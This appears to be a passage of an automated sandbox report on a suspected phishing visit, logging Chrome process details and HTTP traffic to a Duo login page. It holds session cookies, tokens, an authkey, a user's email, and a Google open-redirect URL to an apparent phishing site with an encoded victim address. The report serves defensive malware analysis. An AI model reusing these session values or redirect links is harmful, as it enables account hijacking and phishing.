                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=True
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:49:16 UTC637INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:16 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Length: 1797
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          X-S3-Assets: ux-asset-commercial.duosecurity.com
                                                                                                                                          Etag: "6761231a5422395cd9662b621a76d389a0668743"
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ux-asset-commercial.duosecurity.com; connect-src 'self'
                                                                                                                                          2024-11-18 05:49:16 UTC1797INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 69 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Login</title><meta charset="utf-8" /><meta name="viewport" content="width=device-widt


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          92192.168.2.165295335.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:16 UTC1147OUTGET /static/css/page/login.css?v=8850e HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          If-None-Match: "672e588f-106ef"
                                                                                                                                          If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          2024-11-18 05:49:16 UTC554INHTTP/1.1 304 Not Modified
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:16 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-106ef"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          93192.168.2.165295435.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:17 UTC1131OUTGET /static/js/page/login.js?v=0f15c HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          If-None-Match: "672e588f-d8bed"
                                                                                                                                          If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:49:17 UTC554INHTTP/1.1 304 Not Modified
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:17 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-d8bed"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:00:47:15
                                                                                                                                          Start date:18/11/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                          Imagebase:0x7ff7f9810000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:00:47:17
                                                                                                                                          Start date:18/11/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1896,i,3868343366678002382,12767044061446942759,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                          Imagebase:0x7ff7f9810000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:00:47:18
                                                                                                                                          Start date:18/11/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ=="
                                                                                                                                          Imagebase:0x7ff7f9810000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          No disassembly